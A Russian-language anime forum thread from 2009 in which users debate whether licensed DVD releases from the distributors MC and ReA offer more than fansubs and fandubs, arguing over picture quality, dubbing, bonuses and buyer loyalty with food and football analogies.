Deimos Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 (изменено) Нет, как раз превосходство РеА вполне "объективно"(есть отличия объекты-отличия от фансаба/фандаба). Фансаб не предоставляет ни бонусов, ни картинки в ПАЛ Прогрессив, ни дубляжа.Кому-то дубляж "объективно" не нужен, ускоренному пал прогрессиву, кто-то предпочтёт нормальный (не ускоренный) вариант рипа, да и бонусы - для кого-то не более чем "хрень на диске и рядом" © кто-то.*Все же, что можно найти на дисках МС - можно скачать в интернете, многоголосый закадровик технологически идентичен фандабу, а разница в "качестве" уже субъективна.Кстати, на семинаре в Воронеже, был упомянут такой зверь, как "фэнский вариант дубляжа". Сам, слава Богу, не натыкался, но вот, люди говорили, что есть. Разница в качестве с ним настолько же субъективна, очевидно. :mellow: Субъективизм, сплошной субъективизм, как видим.Более того, пережатая картинка в релизах GTO - свидетельство того, что МС даже нередко объективно(технологически) уступает уровню фанасаба/нет-рипа.Вот кстати, рипа превосходящего по качеству картинки релиз ГТО, мне не попадалось. Важно, что "другие" ежики едят тот же самый кактус(за 300 рублей), только уже привыкли и не колятся, им даже нравится... Так что мазохизм тут...=)Передёргиваешь. :) Для кого-то* любая лицензия - "кактус". Даже Реа. Народ не понимает, как можно тратить деньги на аниме, когда в Инете его бесплатного полно. Для кого-то "кактус" - релизы ВС/СР, для кого-то - МС. Главное не идти наперекор себе, ибо именно это попахивает неадекватным мазохизмом, я считаю (плакать и колоться, но упорно кушать). Хотя, может кому-то "поплакать" в удовольствие... *При том все эти "кто-то" не просто абстрактные зрители в вакууме... конкретных примеров полно в каждой теме. Изменено 4 мая, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Ardeur Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 Кому-то дубляж "объективно" не нужен, ускоренный пал прогрессив, кто-то предпочтёт нормальному (не ускоренному) варианту рипа, да и бонусы - для кого-то не более чем "хрень на диске" © кто-то."Не нужно" объективным быть вряд ли может. А вот наличие - может. Кому-то аниме не нужно - на этом разговор свернется сразу. или кому-то вообще лицензия не нужна - опять же нет разговора. Вопрос можно поставить(более корректно) так: предлагает ли МС/РеА что-то за рамками фансаба/фандаба? МС - нет, РеА - да.Кстати, на семинаре в Воронеже, был упомянут такой зверь, как "фэнский вариант дубляжа".Думаю, это многоголосый фандаб, не более. В любом случае, нужен пример, конечно.Передёргиваешь. Для кого-то любая лицензия - "кактус", для кого-то релизы ВС/СР, для кого-то - МС. Главное не идти наперекор себе, ибо именно это попахивает неадекватным мазохизмом, я считаю.Ну так по делу передергиваю ведь. Для меня случаи когда человек довольствуется малым и, когда не довольствуется, но употребляет, особой разницы не несут в плане качества продукта. Не всегда это возможно не употреблять, например(как в случае с паспортных столом или ЖКХ). Случай с "религиозным" фактором можно оставить(подобные вещи логически объяснить сложно), а вот второй случай? Нет возможности купить пиратку, скачивать фансаб, аниме только в локалке, его мало, человек из провинции, в ближайших магазинах диски только от МС. Что делать? Человек покупает. Но качество его может не устраивать вполне, но будет покупать, ибо выхода нет. PS. GTO у меня рипы от Baka-Anime, кажется. Цитата
Deimos Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 (изменено) "Не нужно" объективным быть вряд ли может. А вот наличие - может.Кому-то, наличие Хэпбёрна необходимо, и Поливанов на лицензии - для них веcкий повод отдать предпочтение фансабу. А кому-то, естественно, наоборот.Кому-то аниме не нужно - на этом разговор свернется сразу. или кому-то вообще лицензия не нужна - опять же нет разговора.Вот это точно. Если лицензия не нужна, то в данном разделе говорить не о чем. =)Вопрос можно поставить(более корректно) так: предлагает ли МС/РеА что-то за рамками фансаба/фандаба? МС - нет, РеА - да.Вся "объективность" сводиться, в конечном итоге, к наличию пал прогрессива - который для кого-то и вовсе "минус", дубляжа - с алогичными свойствами (об этом обширный флуд в соседней теме), и бонусам - аналогам МС'шным двухсторонним обложкам (та же "хрень" по большому счёту <_<).Так что "да, да", или "нет, нет", в зависимости от точки зрения. Субъективизм.Думаю, это многоголосый фандаб, не более. В любом случае, нужен пример, конечно.Да нет, уточнялось. О настоящем фэнском дубляже речь велась (с перезаписыванием звуков и пр.). Без примеров, уж прости. Но впрочем, примеров анимешного фэндаба, который был бы близок уровню МСшного войса - я тоже не знаю. Ну так по делу передергиваю ведь. Для меня случаи когда человек довольствуется малым и, когда не довольствуется, но употребляет, особой разницы не несут в плане качества продукта. Не всегда это возможно не употреблять, например(как в случае с паспортных столом или ЖКХ). Случай с "религиозным" фактором можно оставить(подобные вещи логически объяснить сложно), а вот второй случай? Нет возможности купить пиратку, скачивать фансаб, аниме только в локалке, его мало, человек из провинции, в ближайших магазинах диски только от МС. Что делать?Быть благодарным МС за то что снабжает его аниме, очевидно. =) Но, кстати, поведение этих "вторых случаев" в большинстве своём, вполне адекватно (ИМХО), по моим наблюдениям. "Регионалки" их спасают. Я о других - поведение которых "логически объяснить сложно". ^^ Логика явно страдает, согласен. С чего, собственно, и начал.PS. GTO у меня рипы от Baka-Anime, кажется.Картинка лучше чем у МС? Читал что на зональниках картинка аналогичная МСшной. У меня не знаю чьи рипы, картинка - ужОс. Без слёз не взглянешь. Изменено 5 мая, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Saga-kun Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 Но впрочем, примеров анимешного фэндаба, который был бы близок уровню МСшного войса - я тоже не знаю. Очень жаль. Они за последние годы сильно продвинулись. Разумеется, речь не о глупых детях, не о хамах типа Cuba77 - о нормальных людях. Рекламы делать им не буду, но знаю минимум три релиза, т. е. полных сериала, войсовер которых ничем не хуже, чем средний уровень МС. Цитата
Deimos Опубликовано 4 мая, 2009 Жалоба Опубликовано 4 мая, 2009 Очень жаль.Да нет, не особо. То есть я рад всяким фэнским подвижкам, но именно в фандабе - не заинтересован, практически. В большинстве случаев, всё-равно, предпочитаю сабы. =) Цитата
Ardeur Опубликовано 8 мая, 2009 Жалоба Опубликовано 8 мая, 2009 Вся "объективность" сводиться, в конечном итоге, к наличию пал прогрессива - который для кого-то и вовсе "минус", дубляжа - с алогичными свойствами (об этом обширный флуд в соседней теме), и бонусам - аналогам МС'шным двухсторонним обложкам (та же "хрень" по большому счёту ).Так что "да, да", или "нет, нет", в зависимости от точки зрения. Субъективизм.Субъективизм в отношении только. А я говорю о фактическом наполнении. Естественно, далее, уже отношение к наполнению, конечно, субъективно. Для кого-то двусторонняя обложка=буклет или видеобонус, для кого-то хорошее видео - фигня, ему нравится именно с багами и кривое. Кто-то предпочитает многоголосый войсовер, а не хороший дубляж. Но объекты различаются именно, это неизменно. По каким параметрам МС делает "лицензию"? Сама лицензионность(которая "субъективна" также, ведь никто доказать этого не может, все верят), по сути, все. Взять на той же Горбушке пиратский диск за 150-200 рублей. Картинка, озвучка, сабы - все такого же типа. С РеА история другая. В итоге, главное в том, что РеА дает все, что человек, купивший релиз, может получить от лицензии(в теории). Кому этого мало - не устроит никакая почти лицензия вообще. МС же дает минимум(приличную картинку и сабы). И то есть претензии, например, тот же перевод Пэтлейбора-2 сильно уступает фансаб-переводу.Быть благодарным МС за то что снабжает его аниме, очевидно. =) Но, кстати, поведение этих "вторых случаев" в большинстве своём, вполне адекватно (ИМХО), по моим наблюдениям. "Регионалки" их спасают. Я о других - поведение которых "логически объяснить сложно". ^^ Логика явно страдает, согласен. С чего, собственно, и начал."Быть благодарным" - это как и зависит от уровня требований человека. Деньги ведь платятся. Вот принесли в ресторане(единственном в округе, пусть) пережаренный стейк, кто-то будет жаловаться и тп, кто-то - "хавать" и думать, что "спасибо и на этом"(ресторана-то могло и не быть). Я никогда не оцениваю продукты по вакууму, я оцениваю по работе. Которую у МС(в релизах) мне не видно особо. А что касается "логики", то, Deimos, отсутствие логики не означает вовсе бессмысленность и даже неразумность чего-то. Просто это сложно объяснить(как любую "религиозную" причину). А примеры аналогичные подобрать легко. Вот возьмем футбол. Болеют фанаты, например, за Спартак. Играет он с Динамо. Все ребята пришли на стадион, смотрят игру. Спартак играет отвратительно, проигрывает 3-0 за 20 минут до конца и скорее 4й пропустит, нежели чего забьет. Что происходит на стадионе? Часть людей - уходит, они разочарованы. Часть - остаются до самого конца. Затем, следующий матч Спартака - опять провал. И так еще матчей 6-7. Что после? Часть из фанатов, которые ходили в начале - перестанут ходить. Часть - будет ходить все равно. Ничего не напоминает, Deimos?)Неужели ты думаешь, что те части, что ходят, несмотря на убогую игру, что смотрят матчи до конца - они в восторге от такого футбола и проигрышей регулярных? Просто люди любят клуб("аниме"), и поэтому так себя ведут. Но любить игроков(сегодняшних) тренера, директора команды, то есть непосредственно людей, ответственных за низкосортный футбол(релиз) своего любимого клуба они не обязаны вовсе. Много и других примеров. Цитата
Deimos Опубликовано 8 мая, 2009 Жалоба Опубликовано 8 мая, 2009 (изменено) Субъективизм в отношении только. А я говорю о фактическом наполнении. Естественно, далее, уже отношение к наполнению, конечно, субъективно. Для кого-то двусторонняя обложка=буклет или видеобонус, для кого-то хорошее видео - фигня, ему нравится именно с багами и кривое. Кто-то предпочитает многоголосый войсовер, а не хороший дубляж.Именно об этом я и говорю.Но объекты различаются именно, это неизменно. По каким параметрам МС делает "лицензию"? Сама лицензионность(которая "субъективна" также, ведь никто доказать этого не может, все верят), по сути, все. Взять на той же Горбушке пиратский диск за 150-200 рублей. Картинка, озвучка, сабы - все такого же типа. С РеА история другая. В итоге, главное в том, что РеА дает все, что человек, купивший релиз, может получить от лицензии(в теории). Кому этого мало - не устроит никакая почти лицензия вообще. МС же дает минимум(приличную картинку и сабы).РеА - молодцы, никто не спорит, но и "минимум" от МС вполне востребован, очевидно. Приличная картинка, грамотные сабы, лицензия, русский звук (не в виде ужасно убогого фандаба) - преимуществ перед фансабом - более чем достаточно, имхо."Быть благодарным" - это как и зависит от уровня требований человека. Деньги ведь платятся.В описанной тобой ситуации - люди, покупающие диски, как правило, благодарны. 100 рублей за лицензионный диск с оригинальной дорожкой - поди плохо.Вот принесли в ресторане(единственном в округе, пусть) пережаренный стейк, кто-то будет жаловаться и тп, кто-то - "хавать" и думать, что "спасибо и на этом"(ресторана-то могло и не быть).И опять сомнительные и однобокие кулинарные аналогии. Пережаренный/недожаренный/сырой (часто) стейк - это фансаб. Добротный, вкусный (как правило) борщ - это релизы МС, а РеА - шикарные, обалденные торты. Питаемся мы не раз в год (на одних тортах не проживём), вот и думаем о собственной диете. Лично я, долю некачественной пищи стараюсь свести к минимуму. =)А что касается "логики", то, Deimos, отсутствие логики не означает вовсе бессмысленность и даже неразумность чего-то. Просто это сложно объяснить(как любую "религиозную" причину). А примеры аналогичные подобрать легко. Вот возьмем футбол. Болеют фанаты, например, за Спартак. Играет он с Динамо. Все ребята пришли на стадион, смотрят игру. Спартак играет отвратительно, проигрывает 3-0 за 20 минут до конца и скорее 4й пропустит, нежели чего забьет. Что происходит на стадионе? Часть людей - уходит, они разочарованы. Часть - остаются до самого конца. Затем, следующий матч Спартака - опять провал. И так еще матчей 6-7. Что после? Часть из фанатов, которые ходили в начале - перестанут ходить. Часть - будет ходить все равно. Ничего не напоминает, Deimos?)Напоминает. )))) Я прекратил смотреть футбол после ряда позорнейших поражений "Спартака" за который болел в "Лиги Чемпионов". Замечательный пример =) Правда классный. Ты прям как знал. B)Неужели ты думаешь, что те части, что ходят, несмотря на убогую игру, что смотрят матчи до конца - они в восторге от такого футбола и проигрышей регулярных? Просто люди любят клуб("аниме"), и поэтому так себя ведут. Но любить игроков(сегодняшних) тренера, директора команды, то есть непосредственно людей, ответственных за низкосортный футбол(релиз) своего любимого клуба они не обязаны вовсе. Много и других примеров.Любить клуб - не любя при этом этом не игроков не тренеров, не директоров этого клуба... чего-то я всё же не понимаю в этой жизни. =) Изменено 8 мая, 2009 пользователем Deimos (смотреть историю редактирования) Цитата
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.
Примечание: Ваш пост будет проверен модератором, прежде чем станет видимым.